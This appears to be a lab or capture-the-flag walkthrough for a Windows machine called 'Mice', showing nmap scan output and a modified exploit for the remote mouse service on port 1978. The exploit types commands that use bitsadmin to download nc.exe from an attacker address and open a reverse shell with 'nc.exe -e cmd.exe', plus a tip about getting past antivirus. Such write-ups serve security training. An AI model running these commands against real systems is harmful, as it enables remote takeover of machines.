Mice (Windows)

1978/tcp open  unisql?
| fingerprint-strings: 
|   DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SIPOptions, SSLSessionReq, TLSSessionReq, ms-sql-s: 
|_    SIN 15win nop nop 300
1979/tcp open  unisql-java?
1980/tcp open  pearldoc-xact?
3389/tcp open  ms-wbt-server  Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: REMOTE-PC
|   NetBIOS_Domain_Name: REMOTE-PC
|   NetBIOS_Computer_Name: REMOTE-PC
|   DNS_Domain_Name: Remote-PC
|   DNS_Computer_Name: Remote-PC
|   Product_Version: 10.0.19041
|_  System_Time: 2022-05-18T16:19:09+00:00
|_ssl-date: 2022-05-18T16:19:37+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=Remote-PC
| Not valid before: 2022-05-17T00:09:34
|_Not valid after:  2022-11-16T00:09:34
7680/tcp open  pando-pub?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1978-TCP:V=7.92%I=7%D=5/18%Time=62851BDD%P=x86_64-pc-linux-gnu%r(NU
SF:LL,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(GenericLines,15,"SIN\x2015
SF:win\x20nop\x20nop\x20300")%r(GetRequest,15,"SIN\x2015win\x20nop\x20nop\
SF:x20300")%r(HTTPOptions,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(RTSPRe
SF:quest,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(DNSVersionBindReqTCP,15
SF:,"SIN\x2015win\x20nop\x20nop\x20300")%r(Help,15,"SIN\x2015win\x20nop\x2
SF:0nop\x20300")%r(SSLSessionReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r
SF:(TLSSessionReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(FourOhFourRequ
SF:est,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(LPDString,15,"SIN\x2015wi
SF:n\x20nop\x20nop\x20300")%r(LDAPSearchReq,15,"SIN\x2015win\x20nop\x20nop
SF:\x20300")%r(LDAPBindReq,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(SIPOp
SF:tions,15,"SIN\x2015win\x20nop\x20nop\x20300")%r(LANDesk-RC,15,"SIN\x201
SF:5win\x20nop\x20nop\x20300")%r(JavaRMI,15,"SIN\x2015win\x20nop\x20nop\x2
SF:0300")%r(ms-sql-s,15,"SIN\x2015win\x20nop\x20nop\x20300");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

1978 has an exploit

Modify the script 

cmd1='mkdir c:\\pwn'
cmd2='bitsadmin /transfer job /download /priority high http://192.168.49.183/nc.exe c:\\pwn\\nc.exe'
cmd3='c:\\pwn\\nc.exe -e cmd.exe 192.168.49.183 443'

def PopCalc(ip):
    MoveMouse(-5000,3000,ip)
    MousePress(mouse.leftClick,ip)
    sleep(1)
    SendString("cmd.exe",ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    SendString(cmd1,ip)
    sleep(1)
    SendString("\n",ip)
    sleep(1)
    SendString(cmd2,ip)
    sleep(1)
    SendString("\n",ip)
    sleep(25)
    SendString(cmd3,ip)
    sleep(1)
    SendString("\n",ip)
    print("SUCCESS!",ip)

Now because of the antivirus setting, you need to host the file on an actual web server (apache) instead of the python web server or it won't work.

PreviousSunsetNoontideNextinternal

Last updated